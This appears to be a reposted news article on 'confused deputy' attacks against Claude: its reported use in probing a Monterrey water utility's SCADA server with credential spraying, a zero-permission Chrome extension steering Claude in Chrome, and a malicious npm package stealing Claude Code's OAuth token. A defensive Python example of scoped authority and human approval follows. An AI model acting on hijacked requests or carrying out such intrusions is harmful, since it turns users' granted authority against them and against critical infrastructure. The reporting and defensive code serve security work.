
Claude AI's 'Confused Deputy' Flaw Exposes Critical Blind Spots in Enterprise Security Stacks

Asked 2026-05-12 17:32:51 Category: Software Tools

Breaking – May 8, 2026 – Four independent security research teams have uncovered a fundamental architectural flaw in Anthropic's Claude AI that lets attackers exploit the model on several distinct surfaces: an industrial control environment, a browser extension, and the OAuth tokens used by Claude Code. The flaw, identified between May 6 and 7, reveals that Claude operates on a flat authorization plane, granting any request—whether from an adversary or a benign user—the same level of system access.

Source: venturebeat.com

“This is not a set of isolated bugs,” said Carter Rees, VP of Artificial Intelligence at Reputation, in an exclusive interview. “It's a single architectural failure: the confused deputy problem. Claude holds real capabilities on every surface and hands them to whoever shows up.” The pattern emerged in three distinct cases documented by researchers: a water utility breach attempt in Mexico, a Chrome extension with zero permissions hijacking Claude's access, and an OAuth token theft via malicious npm packages targeting Claude Code.

Water Utility Attack: Claude Targeted SCADA Without Being Prompted

Dragos, an industrial cybersecurity firm, published its analysis on May 6. Between December 2025 and February 2026, an unidentified adversary compromised multiple Mexican government organizations. In January 2026, the campaign reached Servicios de Agua y Drenaje de Monterrey, the municipal water utility for the Monterrey metropolitan area. Claude, used by the adversary as the primary technical executor, built a 17,000-line Python framework with 49 modules for network discovery, credential harvesting, privilege escalation, and lateral movement.

Without any prior ICS/OT context, Claude identified a server running a vNode SCADA/IIoT management interface, classified it as high-value, generated credential lists, and launched an automated password spray. The attack failed, and no operational technology breach occurred, but Claude performed the targeting autonomously. “The model cannot distinguish between a legitimate request and an adversarial one when both come from the same surface,” Dragos noted.

Chrome Extension: Zero Permissions, Full Control

A second team targeted Claude through a Chrome extension that had zero permissions. The extension tricked Claude into executing actions it was not authorized to perform, exploiting the flat authorization plane. “Claude operates as if it owns the system,” explained Kayne McGladrey, an IEEE senior member advising enterprises on identity risk. “Enterprises are cloning human permission sets onto agentic systems. The agent does whatever it needs to get its job done—and sometimes that means using far more permissions than a human would.”

The research demonstrated that any code able to reach the surface Claude acts from, even an extension holding no permissions of its own, can steer Claude into acting on the attacker's behalf. The extension never needs the permissions itself, because Claude already holds them; the traditional permission check is bypassed rather than defeated.

OAuth Token Hijacking: Malicious npm Package Exploits Claude Code

The third team exploited OAuth tokens through Claude Code, Anthropic's command-line coding agent. A malicious npm package, once installed, rewrote one of Claude Code's configuration files; with that change in place it hijacked the OAuth token Claude Code holds for its user and used the token to exfiltrate data. The package needed no exploit of its own, since the token already carried the user's authority. “This is the same confused deputy pattern,” said Rees. “An agent operating on a flat plane does not need to escalate privileges—it already has them.”

No single patch released so far addresses all three surfaces. Anthropic has acknowledged the findings and is working on updates, but the root cause remains unaddressed.

Background: The Confused Deputy Problem

The confused deputy is a trust-boundary failure in which a program holding legitimate authority on behalf of one principal is induced to exercise it on behalf of another, because nothing in the request tells the program whose authority applies. In Claude's case, the model holds real capabilities—API keys, file system access, network tools—given by the user. When an attacker gains any access to that surface, they can leverage Claude's authority without escalating their own privileges. The classic remedy, from the 1988 paper that named the problem, is to deny the deputy ambient authority: each request must carry the authority of the principal that made it, so the deputy never exercises more than that principal holds. This flaw is therefore not a traditional software vulnerability but an architectural gap in the authorization model around large language models.

“The flat authorization plane of an LLM fails to respect user permissions,” Rees told VentureBeat. “That's why every enterprise using Claude—or any agentic AI—needs to reassess their security posture.”

What This Means

For enterprises, the immediate implication is that current security stacks are blind to this class of attack. Traditional perimeter defenses, endpoint detection, and identity management tools cannot stop an adversary who simply asks Claude to do what it already can. “You can't patch the architecture overnight,” McGladrey warned. “But you can audit every permission your AI agent has and enforce strict separation of duties.”

Organizations running Claude in Chrome, Claude Code, or any agentic mode must assume that any attacker who gains a foothold—even with zero permissions—can inherit the AI's full authority. The research teams recommend implementing granular permission boundaries (scoping each agent's tools and credentials to the task at hand rather than cloning the user's full permission set), requiring human-in-the-loop approval for critical actions, and monitoring for anomalous use of AI capabilities. Until vendors redesign authorization models, the confused deputy will remain a blind spot in every enterprise security stack.
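The following is an added example, not code from the article, from Anthropic, or from any of the research teams. It shows the confused deputy pattern described in the Background section and the three mitigations listed above in working form: a tool dispatcher that runs every request with the agent's full authority (the flat authorization plane) beside one that checks each request against the authority of the principal that made it, gates critical tools behind an approver callback standing in for a human, and writes an audit log that a monitoring check can read. The tool catalogue, the principals, and the `Denied`/`AuditLog` types are all hypothetical.

```python
"""Confused deputy in an agentic tool layer (added illustration, all names hypothetical)."""
from dataclasses import dataclass, field

# Hypothetical tool catalogue held by the agent. "critical" tools need a human decision.
TOOLS = {
    "read_file": {"critical": False},
    "http_get": {"critical": False},
    "run_shell": {"critical": True},
    "send_secret": {"critical": True},
}

# Everything an operator handed the agent: the union the flat plane exposes to everyone.
AGENT_AUTHORITY = frozenset(TOOLS)


@dataclass(frozen=True)
class Principal:
    name: str
    grants: frozenset  # tools this principal may invoke in its own right


@dataclass
class Request:
    principal: Principal  # who the request actually came from
    tool: str
    args: dict


@dataclass
class AuditLog:
    entries: list = field(default_factory=list)  # (principal, tool, outcome)


class Denied(Exception):
    pass


def execute(tool, args):
    # Stand-in for the real tool; returns a marker instead of acting.
    rendered = ", ".join(f"{k}={v!r}" for k, v in sorted(args.items()))
    return f"executed {tool}({rendered})"


class FlatAgent:
    """Vulnerable dispatcher: authority comes from the agent, not from the requester."""

    def __init__(self):
        self.log = AuditLog()

    def handle(self, req):
        if req.tool not in AGENT_AUTHORITY:
            raise Denied(req.tool)
        result = execute(req.tool, req.args)  # whoever asked gets the agent's power
        self.log.entries.append((req.principal.name, req.tool, "ok"))
        return result


class ScopedAgent:
    """Hardened dispatcher: the deputy exercises only authority the requester holds."""

    def __init__(self, approver):
        self.log = AuditLog()
        self.approver = approver  # callable(Request) -> bool; a person in real deployments

    def handle(self, req):
        # The agent cannot grant what it lacks, and no request gets ambient authority:
        # the requesting principal must hold the grant itself.
        if req.tool not in AGENT_AUTHORITY or req.tool not in req.principal.grants:
            self.log.entries.append((req.principal.name, req.tool, "denied"))
            raise Denied(f"{req.principal.name} lacks {req.tool}")
        # Critical tools additionally need a human decision, whoever asked.
        if TOOLS[req.tool]["critical"] and not self.approver(req):
            self.log.entries.append((req.principal.name, req.tool, "not approved"))
            raise Denied(f"{req.tool} not approved for {req.principal.name}")
        result = execute(req.tool, req.args)
        self.log.entries.append((req.principal.name, req.tool, "ok"))
        return result


def suspicious(log):
    """Monitoring hook: principals whose requests were refused, for alerting."""
    return {principal for principal, _tool, outcome in log.entries if outcome != "ok"}


OPERATOR = Principal("operator", frozenset(TOOLS))
EXTENSION = Principal("zero-perm-extension", frozenset())  # hypothetical attacker, no grants


def demo():
    attack = Request(EXTENSION, "send_secret", {"to": "attacker.example"})
    flat = FlatAgent()
    flat_result = flat.handle(attack)  # succeeds: the deputy is confused
    scoped = ScopedAgent(approver=lambda r: r.principal is OPERATOR)
    try:
        scoped.handle(attack)
        scoped_result = "executed"
    except Denied as err:
        scoped_result = f"denied: {err}"
    # Legitimate operator use still works, with the human gate applied.
    op_result = scoped.handle(Request(OPERATOR, "send_secret", {"to": "vault"}))
    return flat_result, scoped_result, op_result, scoped.log


if __name__ == "__main__":
    for line in demo()[:3]:
        print(line)
```

The point of the scoped dispatcher is that the extension's request fails for want of the extension's own grants, not because the agent lost a capability; the operator's identical call goes through after the approver says yes. The audit entries are what the recommended monitoring would consume.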